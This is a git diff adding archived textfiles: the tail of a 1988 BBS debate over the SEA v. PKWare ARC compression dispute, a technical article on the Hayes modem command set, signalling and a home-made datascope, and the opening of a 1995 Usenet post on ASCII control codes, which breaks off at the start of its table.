of the previous +messages - it was stated that the fact that SEA didn't "enhance" or "actively +support" ARC by more frequent and more radical upgades, by supporting more +efficient compression schemes, speeding up the program, etc. is somehow a +justification for someone else to steal his work. No way! This argument is +absurd both legally and ethically. When one offers software for sale, where +does it say one must be chained to it forever more in terms of active +development? I am not saying that I necessarily favor such action, but it is +in no way an excuse to circumvent someone and try to take his intellectual +property away. +---------- +Category 11, Topic 9 +Message 10 Sun Jul 10, 1988 +HOMCHICK [Paul] at 09:08 EDT + +Small correction on historical note... someone reverse enginered LU for unix +and wrote a C program named lar (Library ARchive). lar then was taken up by a +variety of folks including Tom Jennings and myself and was ported to the 16- +bit micro environment. My port "LU86" was for a short time the "standard" for +ms-dos computers, and was the first LU program to support time and date +stamping of member files. + +As to the matter at hand, I'll leave commentary on this fracus to others. Just +to give folks some idea of where I stand, tho: I use zoo exclusively for my +personal and business archiving, and use Vern Buerg's programs when I have to +use an ARC file. When Phil Katz improved upon ARC by adopting his own SQUASH +method, it would have been far preferable if he had adopted his own PKA or PKX +format instead of riding on the coattails of SEA ARC, and appropriating their +market and format. + +This all revolves around the concept of an ARC, and whether or not it is a +unique, copyrightable entitiy. There were no ARC files before Thom Henderson +wrote ARC.EXE, he clearly invented same. He copyrighted his work, and set +about trying to make money from it. Then Phil Katz wrote a program that did +the same thing and started competing in the same markets with SEA/Henderson. +Not only did he appropriate "ARC", he made his program slightly different with +SQUASHING, so that SEA's program no longer worked on the formate SEA had +invented, copyrighted, and marketed. To me, this is 1) theft of intellectual +property, and 2) unfair competetition to boot. + +Oops! I guess I got carried away and let you know how I feel about this. +Phil Katz is a great programmer, and PKware is good stuff. If PKARC hadn't +gone around masquerading as ARC when it wasn't, and had been presented as a +new, improved, alternative, then I might be using it and there would be no +suit. But that is not what happened. Moral: make certain that the coattails +you ride on do not require a fare! +---------- +Category 11, Topic 9 +Message 11 Sun Jul 10, 1988 +MDEVORE [Michael] at 11:29 CDT + +Careful with that "justification for someone else to steal his work." phrase +Charlie. I think the way PK did it was slimy, but fact is, algorithms can +*NOT* be copyrighted. IMPLEMENTATIONS of algorithms can. + +Further, the compression techniques Thom uses are generally considered public +domain. Several programs legally use one or more types. There may be a +technique he came up on his own, I dunno. Certainly he didn't come up with +all of them. The LZW compression algorithm is one example. + +You may or may not be able to say that Mr. Katz stole Mr. Henderson's +implementation of the algorithms used. You can not say that Mr. Katz stole +Mr. Henderson's algorithms. Such an argument is, shall we say, "absurd both +legally and ethically". + +---------- +Category 11, Topic 9 +Message 12 Sun Jul 10, 1988 +HOMCHICK [Paul] at 12:55 EDT + +There is a legal distinction here between patent and copyright, which I am not +certain that we are taking into account. However, there is also a moral +argument which goes: Thom Henderson invented the ARC format and sold it +commercially. A competitor appropriated that format and name and also began +commercial sales which hurt the inventor and "owner" of ARC. That is either +right or wrong. Take your pick. +---------- +Category 11, Topic 9 +Message 13 Sun Jul 10, 1988 +J.JIMENEZ at 13:54 EDT + +Mike, PK did NOT build a better mousetrap. He copied an old mouse trap and but +a bigger spring on it. Note that there has never been any other documentation +on the ARC file formats other than the source code which SEA released. This in +itself may not be proof that PK copied the algorithm, but if he didn't he was +very stupid to make his program so compatible with ARC, if in fact it was +developed independently. + +The Fido issue has nothing to do with this, but I was involved with Fido for a +long time while it was experiencing growing pains. The reason some people +"don't like" Thom is because a lot of the ideas he had for Fido and the net +were geared towards better organization and a centralized control over the +net, which makes a lot of sense. Right now there are a number of independent +nets, and it's a mess. I don't intend to represent all the Fido people, but I +do have a very clear picture of the story behind Fido because I was part of +it. + +Note also that at no time did SEA or Thom say that no one could make a clone +of ARC. The fact is, he has every right to say such a thing. However, he chose +not to. He released copyrighted code to the public to promote clones, under +very specific conditions. PKWare broke the rules, period. + +BTW, if market tells all, how come I have heard so many people complain about +PK's "new" compression formats, etc. for the last year or so? The statement +that most BBS' have converted to PK is quite innacurate. Most BBS' do make PK +available and do support squashed files, but in essence the vast majority of +those files are still using the original ARC formats. + +You really think that shareware authors are basically incompetent? Do you +include yourself among that group, or are you above that. How would you like +to see people copy your OVL program and sell it as PKOVL, using your ideas to +make money for themselves by just making it a little faster? Would you do +something about that to protect your rights? + +ARC was developed in C, a language which you personally have said is the +language of choice. ARC is slow, but it is also portable. Proof of this is +that there are Unix, CP/M, Amiga, Mac and all kinds of other weird ports of +ARC running around. No such luck for PKARC. PK has tried to do something about +this by publishing the PK squash file and archive formats, which are basically +the same as the ARC formats except for comments and the "squash" algorithm, +but it hasn't helped much. + +I will agree with you that algorithms cannot be copyrighted, but PK has gone +much further than that, by copying the algorithms, the file formats, the +implementation and even the NAME of the program, ARC, down the file extensions +it creates its files with. + +I also agree with Paul's statement that if PK had simply come up with a faster +solution, not a faster copy of the solution, he wouldn't be in the trouble he +is now. Notice that SEA did not, and as far as I know has no intention of, +suing Rahul for his ZOO. Nobody has sued SEA for their ARC either, because it +was developed independently with new ideas and concepts, but using public +domain algorithms. + +Juan +---------- +Category 11, Topic 9 +Message 14 Sun Jul 10, 1988 +MDEVORE [Michael] at 14:25 CDT + +Excuse me? Where did I say that shareware authors are basically incompetent? +I paid hard earned cash for both Qmodem and ProComm. I consider both of them +better than many commercial packages. PC-Write, PC-File, Patriquin's +utilities all get high marks in my book. Closer to home, I've only heard good +things about your own GSETUP. I support *GOOD* shareware, and *GOOD* +shareware does exist in reasonable quantities. Incompetent and mediocre +shareware exists in huge quantities, but that's another matter. + +Your analogy is faulty. I didn't release source code to OVL or PROVL. If +someone else comes up with a better version that doesn't steal executable code +from my program, there isn't a darn thing I can do about it. If, *IF*, PK did +in fact steal source code from SEA and perform a straight translation, he's +slime and should pay a price. However, I don't hold Thom blameless in this +affair either, as per my previous messages. + +I admit that PK stepped in it when he copied the ARC name, and most especially +the .ARC extension. Like I said, of the two, PK is higher on my dirt list. +He should have used a different file extension and supported the .ARC +extension (sans squashing) as well. He'll prolly get toasted for that +particular decision, if any. + +As far as appropriating a format and name and beginning commercial sales which +hurt an inventor and owner, except for the name part, that sounds a lot like +the Lotus lawsuit against Mosaic and Paperback (?) Software. Look at all the +dBASE III clones. They use dBASE III's language format, and I guarantee that +the sales of some of the stand-alone dB3 compilers take away sales from A-T. +There is also Mirror, the Xtalk clone. The list goes on. Clone software +copies a general format and takes sales away from the original. Some clones +add enough features that they become the new standard. Evolution. + +Lastly, there is a distasteful argument that I have heard, which unfortunately +does have some validity to it. PKARC has saved thousands of people thousands +of hours. PK is even significantly faster than Vern's utilities. A piece of +software that helps so many people isn't 100% evil. I seen many testimonials +from PK fanatics around the circuit. I won't use that argument, but you +should be aware that many do. The average Joe or Jill doesn't much care about +arcane legalities (s)he doesn't understand. Outright theft, yes, but PKARC +code has not been proven to be stolen from SEA's source code -- although one +can have some suspicions about the matter. + +---------- +Category 11, Topic 9 +Message 15 Sun Jul 10, 1988 +STROM [Charlie] at 15:43 EDT + +Mike, I don't even want to try arguing whether Phil stole anything or not. The +point I was trying to make is that it is wrong to use an argument expressed in +the earlier messages - namely that if a software author does not "support" his +product well enough in the eyes of another, it is then somehow okay for the +other fellow to walk off with his work. This is a red herring. +---------- +Category 11, Topic 9 +Message 16 Sun Jul 10, 1988 +M.MELLO at 16:14 EDT + +For another opinion: Personally, I prefer PK because it is faster, writes a +smaller archive (with "squashing") and interfaces well with many menu driven +"arc" utilities written for it. The individuals crying foul because of the +archive's ARC extension should take a look at possible copyright violations +each time they write a "DOC" file for their own shareware releases. Doesn't +someone own a patent on a file extension of DOC? Or WK1, WKS, or WK? ?? Who +cares? + Additionally, if the programs seem to operate alike, but the difference +in speed is so dramatic, who is stealing from whom, if anyone? If the +program is SO inferior as compared to ARCE and ARCV or the original ARC, then +WHY is it so popular? In this area, and most others that I'm aware of, +_________PKARC________ is the standard, NOT ARC. I think one would do well to +re-evaluate the sample taken of archive users to see what is really being +used more. + The programs, when viewed side by side, may perhaps appear to be +related. So they are! If they were really identical, I would be able to +squash my huge DOC files with ARC and unsquash with PKXARC, right? NO! So +the code cannot be identical. Alike, perhaps. I think if you'll look to see +how some of the code is for many of the PD workalikes, like AS_EASY_AS and +PC_WRITE, you'll see that there are many ways to skin a cat, as it were, but +only a few BETTER or BEST ways. Perhaps both PK and ARC are both latched on +to the same method? + I have no sympathy for whining, back biting little programmers who see +their business being taken away by a superior product. These types will run +to the courts and present fancy mumbo-jumbo legalese documents to support +their own shortcomings without being able to recognize that the only reason +for their distress is that they are getting their buns kicked! I have always, +and will continue to support and use Phil Katz' products, as they have +demonstrated on MY machine superior performance compared with older, less +efficient products that purport to out perform them. NUF SAID! +---------- diff --git a/textfiles.com/computers/arthayes.txt b/textfiles.com/computers/arthayes.txt new file mode 100644 index 00000000..1d85f2df --- /dev/null +++ b/textfiles.com/computers/arthayes.txt @@ -0,0 +1,585 @@ + ================================================================= + COLUMNS + ================================================================= + + Host net 508, Node:508/4 Tel. int+55 421284 + Ignaat Simons + Chopinlaan 3 + 7333GA Apeldoorn Netherlands + + HAYES modems and compatables. + + + 1. Introduction. + + In the world of modem freaks and slowly on in the industrial + world, the HAYES modem is a defacto standard. + + The official standards like RS232c (USA) and V24/V28 (CCITT) + describe the Physical part of a data circuit, while the V25 + (CCITT) describes the A(uto) C(call) U(unit) function. The + speeds and usage of the modems are laid down by the CCITT V- + standards, mainly in the V21 till V36 books. + + Due to the different country and telephone company laws, + modems are different and not compatable with each other, + exept modems of one vendor. Some years ago, it was very + unwise to make a connection with two different modems, even + if they claimed to be according a V-xx norm. Mostly this + was no problem, because a data transport was mainly between + two predefined points via a leased line or switched network. + The connection was buildup manual, or made automatic via + autocall function ACU (V25/RS232). + + The HAYES-300 modem (I think this was the start), besides + the Physical RS232/V24/V28 norm did specify the modem + control command level between modem and terminal via the AT + leadin and the +++ command to return from + a data state to the command state. Also it describes the + handling of automatic speed detection. This command set + enables operators and application programmers to buildup a + connection via normal conversation. As it could be + programmed, the connection via a switched network was + possible automatical via simple statements like "CALL John". + The original HAYES-300 was not using call procedures like + 108/1 or 108/2 (DTR circuit). With the HAYES-1200, this + command set was extended to cope with more than one line + speed, the BELL 103 and BELL 212A. The last one more or less + compatable with the CCITT V22 norm. Also the automatic speed + selection in 'answering' mode was build in. With the HAYES- + 2400, the set was dramatically extended with three speeds, + BELL-103, BELL-212A and the CCITT V22 and V22bis norms. So + handling also in 'answering' mode an automatic selection. As + the BELL-212A and V22 uses a PSK (four-level phase shift + keying) and V22bis uses QAM (Quadrature Amplitude + Modulation) technic, which were designed for synchronous + modems, the HAYES-modem translates the asynchrone data into + + + a synchronous way by inserting and consequently removing a + STOP bit in periods where no character is send. The HAYES- + 1200 is not compatible with the BELL-212A/V22 synchronous + modems. The HAYES-2400 is also in this aspect compatible and + serves also the formal Half duplex (RTS/CTS-handling). As + the HAYES-1200 did serve only the CCITT 108/2 mode, the + HAYES-2400 supports also the 108/1 mode. Really you can say, + the HAYES-2400 is a complex intelligent unit. Despite the + well written handbook of HAYES, it is a hard job to make a + compatible one. From all modems (compatibles) I have seen, + there are a few which come close to the HAYES, the most are + fare away. + + As my job is Faultfinder (Support), I really was very + pleased, HAYES did implement in the HAYES-2400, a really + complete circuit test via the S16-register, even with remote + commands, so the fully V54 norm of CCITT. As most Hobbyist + but even profesionals have big problems with reliable + circuit connections, and more the solvation of it, a modem + without this feature nowadays isn't worth the word MODEM so + certainly not the word HAYES. + + 2. HAYES-clones. + + What is "compatible". Really nothing if not exactly said + with WHAT. "HAYES compatible" is to vaque. "HAYES command + set compatible" is better. Most modems, so not all, are only + compatible with a "subset of HAYES command set". But also + most "hayes" modems have commands not existing with hayes. + Some unlucky vendors did use commands or registers not used + with hayes-1200 at that time, but later used in the HAYES- + 2400. (Bad Ques). + + The best I can say most of the better clones are more or + less compatible upto HAYES-1200. + + As I don't know if besides HAYES-1200 and the HAYES-2400, + also a HAYES-300 exists, I further only refer to this two, + from which both I have the specifications. In Europe a lot + of 'hayes' modems with only the V21 and V23 speeds exists, + which are similar, but absolute not connectable, with the + BELL-103 and BELL-202 norm modems. + + As most application programs only use a small set of the + HAYES-command set, most clones will run with these packages + such that the user is pleased, not to use his fingers and + ear to make a connection. This if he has a user friendly + telephone company (are there), but mostly the results are + hopeless in peak hours, if there is a mismatch between the + modem commands and the terminal commands. I had a modem and + a terminal program and on some day no nice CALL + was succesfully. With finger and ear there was no problem. + Reaction of the terminal was "BUSY". The real point was, the + modem did not pickup in ATX2 mode the dial tone from the + Telephone company, so didn't start dialling. As the modem + had not a speaker (for cheapness), I could not use the ATM1 + + + command, to follow the connection process. The dial signal + was strong enough, but the frequency was a little ouside + (WHO's) specification. + + 3. The HAYES set. + + With this I hope, without copying the whole 250 pages of + both Hayes handbooks, to give enough information to + understand the HAYES-set and the differences. + + Hayes propose to use as terminal program, the Hayes Smartcom + II Version 2.1. + + 3.1. The Physical DCE/DTE-lines. + + With DTE is meant the Data Terminal Equipment (Your terminal + or Host computer) and with DCE the Data Circuit + (termination) Equipment (all equipment between two modems + RS232 plugs). The HAYES-1200B is the 1200 type but as a card + to be fitted into an IBM-PC. The same for HAYES-2400B. + + The pin assignments must be in accordance to ISO 2110. + + Pin # Circuit Towards Description 1200 2400 + EIA/CCITT + 1 AA 101 N/A prot. ground x x + 7 AB 102 N/A signal ,, x x + + 2 BA 103 DCE transmit data x x + 3 BB 104 DTE receive data x x + + 4 CA 105 DCE request to send x + 5 CB 106 DTE clear to send H x + 6 CC 107 DTE data set ready R x + 20 108.1 DCE connect data set x x + 20 CD 108.2 DCE data term. ready x x + 22 CE 125 DTE ring indicator x x + 8 CF 109 DCE data carrier detected x x + 23 CI 112 DTE select altern. rate x + 12 CI DTE as previous (Bell212) x x + + 24 DA 113 DCE TX-clock (DTE source) x + 15 DB 114 DTE TX-clock (synchr.) x + 17 DD 115 DTE RX-clock (synchr.) x + + Remark: x means served by the modem. + H means tied to +10 volt (True). + R means tied to pin 8. + Pin 20 (DTR) can be simulated in the 1200 and + 1200B type with a dipswitch. + Pin 6 and 8 can be forced to true in the 1200 + and 1200B type with a dipswitch. + + 3.2. The telephone line. + + On the telephone lin level some distinction can be made on + + + the HAYES-2400, between jack type RJ12/RJ13 (multi line + jack) and the RJ11/RJ41S/RJ45S (single line jack). The 1200 + only supports the RJ11 (single line), RJ12/RJ13 (multi + line), which can be set by dipswitches. This typically is + different per country. In the USA and some other countries, + the telephone set remaines connected in parallel to the + modem. In other countries like the Netherlands the telephone + set is switched of, as soon as the modem goes off-hook. + + 3.3. The modulation frequencies and call setup phase tones. + + The following information is not exactly the HAYES-modem + information, but a hopefully readable extract from the + CCITT-norms. As I have not the Bell-norms, more or less the + USA norms are deducted from other documents. + + The frequencies used with the different baudrates are: + + 3.3.1. For the F(requency) S(hift) K(eying) methodes. + These can be used as well as Synchrone. + + Norm Send Receive Answ. mode + '0' '1' '0' '1' tone + Bell-103(ORG) 1070 1270 2025 2225 1270 300 FD + Bell-103(ANS) 2025 2225 1070 1270 2225 300 FD + Bell-202(main) 2200 1200 2200 1200 2025 1200 HD + Bell-202(back) 487 387 487 387 - 0-150 HD + V21 (ORGinate) 1180 980 1850 1650 980 300 FD + V21 (ANSwer) 1850 1650 1180 980 2100 300 FD + V23-1 (main) 1700 1300 2100 1300 2100 600 HD + V23-2 (main) 2100 1300 1700 1300 2100 1200 HD + V23 (back) 450 390 450 390 - 0-150 HD + Remark: '0'= "start bit" = "space" + '1'= "stop bit" = "mark" + FD = Full Duplex, HD = Half Duplex. + + Important is, the modems use filter technics to seperate + the transmit channel and receive channel. Some autoanswering + modems also by filter technics decide in which mode they are + called. + + 3.3.2. Automatic answering sequence (V25). + + If ringing is received on the line, the CE/CT125 circuit + (pin 22) will be raised true. If CD/108 circuit was true, + the modem goes OFF-HOOK. If not the modem waits for a true + signal on CD/108 (pin 20), before it goes OFF-HOOK. The + modem remains after 'off hook', for 1.8-2.5 sec. silent and + then transmits the 2100 Hz. answer tone during 2.6-4.0 sec. + or till 100msec. after a response from the calling station. + At least now 75 msec. silence is maintained. The 2100 Hz is + intended to disable network echo cancellers or echo + suppressors and is reversed in phase every 425-475 msec. Now + the circuit CC/107 (pin 6) is set true to indicate to the + terminal, a connection is ready. The calling modem reacts on + the answer tone also by setting circuit CC/107 (pin 6) true. + + + A response normally as mentioned is the frequency of a + binary '1'. If the equipment of the telephone company does + not have echo control devices, the 2100 Hz tone may be + replaced by any other tone e.g. directly the binary '1'. + Only after this sequence (or in ommission of it) directly + the autospeed modems will determine the baudrate norm. In + Europe, with its V23-splitbaud rate complexity, there are + Hayes compatibles trying to select at the moment after the + answer sequence to select: V21, V23 (viditel), V22 and + V22bis. This means actually a detection criteria for carrier + frequencies at 980/1180 (V21), 450/390 (V23) and 1200 + V22(bis) modulated with 600 baud. At the same time all kind + of frequencies like 2100, 550, 1800 Hz. and busy tone, dial + tones around 425 Hz. has to be ignored. + + 3.3.3. For the D(iferential) P(hase) S(hift) K(eying) + and the Q(uadrature) A(mplitude) M(odulation) methodes. + + These methodes are primarly for synchrone transmission, but + asynchrone is allowed by inserting extra stop bits between + characters. + + Norm Send Rec. Guard tone Mode Methode + + V22 (ORG) 1200 2400 - 600/1200 FD DPSK + V22 (ANS) 2400 1200 1800(550) 600/1200 FD DPSK + V22(bis) (ORG) 1200 2400 - 1200/2400 FD QAM + V22(bis) (ANS) 2400 1200 1800(550) 1200/2400 FD QAM + Bell-212A (ORG) 1200 2400 - 1200 FD DPSK + Bell-212A (ANS) 2400 1200 - 1200 FD DPSK + + The guard tone is only send in the high channel (2400 Hz. + carrier, so by the answering modem, but can be disabled per + country. The 550 guard tone is another option. Basically + the Bell-212 and the CCITT-V22 are the same. But in detail + there are differences. Which, I don't know yet for sure, it + may be the scrambled '0' instead '1's (see lateron). But in + the HAYES-2400, there is a command ATBn, with which the + BELL-212 (n=1) or V22 (n=0) is selected. This only for the + 1200 baud FD mode. The V22bis is fully compatible with the + V22 norm. The difference between V22 (600/1200 baud) and + V22bis (1200/2400 baud) is V22 works with 2 dibits and + V22bis with quadbits. The way of working of PSK/QAM modems + is to complex to explain here, but it is important to know + that a phase change of the modulated carrier of: + + 0 degrees is equal to dibit 01 + 90 degrees is equal to dibit 00 + 180 degrees is equal to dibit 10 + 270 degrees is equal to dibit 11 + + These first two bits in the V22bis quadbit are compatible + with the dibits of V22, to remain compatabilty for fallback + mode. The V22bis has another 4 levels of detection by means + of a quadrature amplitude modulation technic. + + + + 3.3.4. Automatic answering mode V22(bis). + + At calling time the sequence as described above with the FSK + type modem is valid for the V22(bis). The called modem + reacts instead or after the answer sequence with unscrambled + binary '1's at 1200 bit/sec. and well in the upper channel + (2400 Hz. carrier). This till it detects scrambled '0' or + '1's in the lower channel (1200 Hz. carrier). The calling + modem remains silent till it for 155 msec. detects + unscrambled '1's in the upper channel, after which it + remains silent for 456 msec. and then transmit unscrambled + double dibits 00 and 11, if in V22bis mode, for 100 msec. + followed by scrambled binary '1's or if in V22 mode it + transmits direct scrambled binary '1's (*). Here the + distinction 1200/2400 baud is made by the calling modem. The + called modem reacts with scrambled '1's preceded, if V22bis + with the unscrambled double dibit 00 and 11. At the moment + of detection of the double dibits, the circuit CI/112 (pin + 12) is set true (indicating 2400 baud). In both cases the + scrambled '1's are observed for 600 msec. after which the + circuit CF/109 (pin 8) is set true. If V22 (1200) the data + transfer is started under control of CA/104 (pin 3). In the + V22bis mode (2400), first scrambled binary '1's are send + form both sides for 200 msec. on 2400 bit/sec. mode. Noted, + that till now all was transmitted on 1200 bit/sec. After + this 200 msec. also the V22bis mode is ready for data + transfer. + + I know it is confusing, but so it works. To make it more + difficult, the (*) mentioned in the text is true for V22bis + and for V22 alternative A and B only. For V22 alternative C, + for the '1's you have to read '0's. As the V22 norm is very + confusing on some aspects, one remark has to be made. In V22 + (not V22bis) 3 alternatives can be selected. Alternative A + and B are compatible with V22bis, but alternative C not. The + difference is the scrambled binary '0's stead '1's of the + calling modem. So the real difference between alternatives + A/B and C is, that alternative C includes the possibility + for mode V, for anisochronenous data upto 300 bit/sec. Which + manufacturer tells me which alternative as mentioned in V22 + he serves. Or has this to do with the Bell-212 norm. Who can + tell? Has this to do with the famous ATBn command in the + HAYES-2400 modem? See above. + + Be carefully with these V22 and Bell-212A norms. As + explained before only the 2400 baud (V22bis) is compatible. + The 1200 sometimes works, but sometimes not. E.g. I had an + USA RIXTON 212 modem, not corrected for the European market. + Also I had a Dutch designed (DATAD) V22(bis) V23 and V21 + modem and an English (PACE) for the same speeds. The RIXTON + works pretty most at the time with both the DATAD and PACE + modem. But sometimes it goes wrong and the Eurpeans connects + at 2400, which is strange, but true. With an original HAYES- + 1200 (with no ATBn) command as the HAYES-2400 has, nearly + the same result. The two Europeans hardly are connectable at + 1200 baud to each other. This has in my opinion to do with + + + the way of speed selection. We try to come out of this + struggle. + + 3.4. Some advise on real physical level. + + If you are ggiing into communications with modems and you + have no Telecomfreak-friend close to you and you want no + nervous breakdown in the near future, have at least a + "breakbox", self made or from the shop. This to follow the + different DTE/DCE levels. If you want to log a HAYES session + to evaluate the connection process or data exchange process, + make from your old computer a "DATASCOPE". (See Appendix A + for some suggestions). An other advise is to standardise + your cable set. As some manufactures make a mash of the V24 + or RS232C pins, you have not to follow it. On telephone + line level it is handy to have in your surrounding a scope + or frequency counter. + + 3.5. Connection of the terminal to the HAYES. + + The Hayes modem has a minimum and a maximum baud rate. If + you connect a terminal to the modem, make sure you have the + right pins connected in relation with the dipswitches. Also + if you have selected e.g. 108/2 mode, be sure your terminal + program support them. It is possible to connect only the + pins 2,3 and 7. So in this case the DTR and the DCD are + forced true. In general I don't like this methode. With the + Hayes-1200, RTS and CTS are not used, so only full duplex is + possible. With Hayes-2400 you have to use these signals only + if you use the Half Duplex mode (Synchrone mode). Otherwise + RTS (pin 4) is neglected and CTS (pin 5) is set true. + + So if you have connected the terminal properly, at the time + you give an 'A' or 'a', the modem decides what the baudrate + is and set the terminal interface UART according to it. + Hayes is very street forward. This speed is maintained till + after the , which always finishes a command + line. With the next A from a new AT command line, a new + speed can be defined. There is one other possibility. In + auto answer mode or if a call is made, the baudrate can be + else as the speed in the last passed command mode. This on + real modem level, the baudrate detection selects another + speed. The Hayes reacts with the connect code on this last + command mode speed and than switches to the new speed. To + give an example. Suppose the terminalspeed is 2400 baud. A + dial is made towards a 1200 baud only modem. The Hayes will + start the connect phase as described in 3.3.2. but finally + will get a connection on 1200 baud. So he will react towards + the terminal with 2400 baud with 'CONNECT' or '1', switches + back to 1200 baud, which the terminal has to follow, + otherwise it result in a terminal/modem mismatch. Also a + +++ on 2400 baud will not be accepted. + Only 1200 baud, from this moment on. So suppose the + established call at 1200 baud is broken. The Hayes will, + after the carrier disappear, fall back into command mode + still in 1200 baud. The terminal has to give an AT + + + on 2400 baud if it wants the original 2400 baud connection + again. + + 3.6. The differences in the Hayes command set. + + Very short a comparision between HAYES-1200 and HAYES-2400 + modem will be given and only per command a short functional + recoqnition. First however the Hayes command-input line. It + starts with AT or at (no mix of UPPER/lower) and ends with a + cariage return from now on indicated with . The only + exeption is the A/ command, which needs no . During + commandline editing backspace (hex '08') is accepted. One or + more commands can be given after one leading AT. The max. + length of the input string however is 40 char. + Blanks can be inserted for more readability. + + Command. What does it. Hayes-1200 Hayes-2400 Return code + + AT Attention y y OK + A/ Repeat last comm. y y depends + A Off hook (ANS) y y none (data) + Bn 1200 (V22/Bell) - n=0-1,1 OK + Cn TX off/on n=0-1 - OK + D Dial y y see modifier + En Echo off/on(comm) n=0-1 n=0-1,1 OK + Fn Echo off/on(data) n=0-1 - OK + Hn Hook on/off/spec. n=0-2 n=0-1 none (data) + In prod.code/prom-cc n=0-1 n=0-2 info + Ln Speaker (L/M/H) - n=0-2,1 OK + Mn Speaker off/on n=0-2 n=0-3,1 OK + On Online only O n=0-1 none (data) + P Set pulse dial y y OK + Qn Result code Y/N n=0-1 n=0-1,0 OK + Sr=n Set reg. r to n r=0-16 r=0-27 OK + Sr? Display reg. r r=0-16 r=0-27 contents r + T Set touch dial y y OK + Vn Result code N/W n=0-1 n=0-1,1 OK + Xn Dial process n=0-1 n=0-4,4 OK + Yn Long disconn. - n=0-1,0 OK + Zn Reset only Z n=0-1 OK + + &Cn DCD on/carrier - n=0-1,0 OK + &Dn DTR modes - n=0-3,0 OK + &F Load factory set - y OK + &Gn Gaurd tone - n=0-2,0 OK + &Jn RJ-jack sel. - n=0-1,0 OK + &Mn Asynch./Synchr. - n=0-3,0 OK + &Pn Pulse ratio - n=0-1,0 OK + &Rn CTS mode - n=0-1,0 OK + &Sn DSR mode - n=0-1,0 OK + &Tn Test local/remote - n=0-8 OK + &V Display conf/tel - y OK + &Wn Write conf. MOS - n=0-1 OK + &Xn Line clock mode - n=0-2,0 Ok + &Yn Sel. default prof.- n=0-1 OK + &Zn Store teleph. nr. - n=0-3 OK + + + Remark: n=0-2,1 means, n can be 0,1,2 and 1=default. + If n=0 this may ommitted. (ATV0 equal to ATV). + All numbers are in decimal (max.=255). + + Dial What does Hayes-1200 Hayes-2400 + Modifier it + P Pulse dial y y + R Reverse to ANSW y y + Sn Dial stored tel. - n=0-3 + T Touch dial y y + W Wait 2e dialtone - y + . Pause y y + ! Flash - y + @ Wait for silence - y + ; Return to comm. y y + + The registers. + Reg. What does it. Hayes-1200 Hayes-2400 + S0 Ring to answ.on 0-255 0-255,00 + S1 Ring count 0-255,00 0-255,00 + S2 Escape code 0-127,43 0-127,43 ASCII + S3 Cariage return 0-127,13 0-127,13 ASCII + S4 Line feed code 0-127,10 0-127,10 ASCII + S5 Back space code 0-127,08 0-127,08 ASCII + S6 Wait for dial tone 0-255,02 0-255,02 Sec. + S7 Wait for carrier 1-30,30 1-30,30 Sec. + S8 Pause time comma 0-255,02 0-255,02 Sec. + S9 Carrier detect time 1-255,06 1-255,06 1/10 Sec. + S10 Lost carrier time 1-255,07 1-255,14 1/10 Sec. + S11 DTMF dialing speed 50-255,70 50-255,95 mSec. + S12 Escape code guard 0-255,50 0-255,50 1/50 Sec. + S13 UART status reg. y y + S14 Option reg. y x'AA' + S15 Flag reg. y y + S16 Modem test 0-2,0 bit settings + S17 res. - res. + S18 Modem test time - 1-255,00 Sec. + S19 Res. - Res. + S20 Res. - Res. + S21 Bit mapped options - 00 + S22 Bit mapped options - x'76' + S23 Bit mapped options - 07 + S24 Res. - Res. + S25 Detect DTR change - 0-255,05 1/100 Sec. + S26 RTS to CTS delay - 0-255,01 1/100 Sec. + S27 Bit mapped options - x'40' + + Remark: 1-255,01 means, range 1 till 255, 01=default. + All numbers are in decimal (max.=255). + x'76' is hexadecimal. + + + + Return codes Hayes-1200 Hayes-2400 + Digit Word + 0 OK y y + 1 CONNECT y y + 2 RING y y + 3 NO CARRIER y y + 4 ERROR y y + 5 CONNECT 1200 y y + 6 NO DIALTONE - y + 7 BUSY - y + 8 NO ANSWER - y + 9 reserved - - + 10 CONNECT 2400 - y + + ======== + + Appendix A. Datascope. + + A datascope looks to both the RXD and the TXD line of a + V24/RS232C line. So only follows what happens on the line. + There are very nice commercial packages as FELINE, HP etc., + but they are expensive and they use mostly a special POD to + connect to the V24 line. Most of them you have to preset on + one speed and than to start the logging. + + If you have an old computer with better two speed + programmable UART or a SIO chip and you can program them in + Assembler/basic/pascal or C, you can make your one one. + + The next story is a simplified logunit only to log + datastreams preceded with a AT-string. Most of the + application programs works in terminal session as well + + filetransport in a half duplex mode. Or better, never the TX + and RX line transports a character. So basically in default + you have to look to the TXD-line, and look at 2400 baud for + a character x'41','06', '78' or '01'. At that moment you + know that probably the speed is 2400, 1200, 600 or 300 baud. + You get on line speeds 600 and 1200 a framing error, because + the stop-bit is not detected. Now depending the detected + speed you have to wait (time-out) till the rest of the + character is passed, then you have to change the speed of + your comm-port, and await for the 'T', If it is a 'T' than + you have the speed, if not wait on 2400 baud for the + posibilities as described above. The basic idee behind this + is really simple. If you listen with 2400 bit/sec to a 300 + bit/sec send character, the start bit is detected and will + serve for the startbit and 7 bits char. bits (so 7 zero + bits). The eights char. bit is formed of the LSB bit and + well 1/8 portion of it. The second portion will be the stop + bit. So if on the line really is transmitted a 600 bit/sec + char., the same is true with 1/4 portions. Furthermore you + have to look to both the TXD and RXD line, if on one a char. + is received. If so you put this char. in its own buffer and + in the other one a x'00'. Lateron you can print it out, one + line from buffer RXD, one line from buffer TXD in Hex or + + + ASCII (or both) outfit. + + Go on on the same speed till you didn't receive for 30 sec. + any character on both lines and start again with AT + synchronisation. In fact the HAYES inside micro computer is + doing the same. Don't try to write the buffer to disk at + first instance, because you need a DMA at least, but also 2 + buffers. So buffer it in memory only. You can try to write + to disk in the silence just before the new AT string. + diff --git a/textfiles.com/computers/ascii b/textfiles.com/computers/ascii new file mode 100644 index 00000000..4cae11d8 --- /dev/null +++ b/textfiles.com/computers/ascii @@ -0,0 +1,182 @@ +From: jones@pyrite.cs.uiowa.edu (Douglas W. Jones) +Newsgroups: alt.folklore.computers +Subject: Re: ASCII control codes +Date: 31 Aug 1995 19:37:58 GMT + +From article <4239uk$ko1@metro.ucc.su.OZ.AU>, +by adrianw@cassius (Adrian Whichello): + +> Some are obviously still used for their original purpose (CR, LF, the +> tabbing codes etc.) but what did ENQ, EM, SUB, FS, etc. do? Thanks, + + - - - here's a reply I posted a year ago in June - - - + + Subject: Re: original uses of ASCII control codes + Newsgroups: alt.folklore.computers + References: <1994Jun02.064649.131411@ua1ix.ua.edu> + +To understand the original intent of the ASCII control codes, you have +to think of teletypes, using paper tape, configured in a multidrop +system with relay logic used to turn on or off individual teletypes in +the bunch, and you have to remember that the designers were pretty +smart and they anticipated future developments, but they also managed +to include provisions for things that never happened. Here are the +ASCII control characters, and a few others, with comments on how they +were supposed to be used and how this relates to current popular uses: + + NAME HEX/CTL USE + + 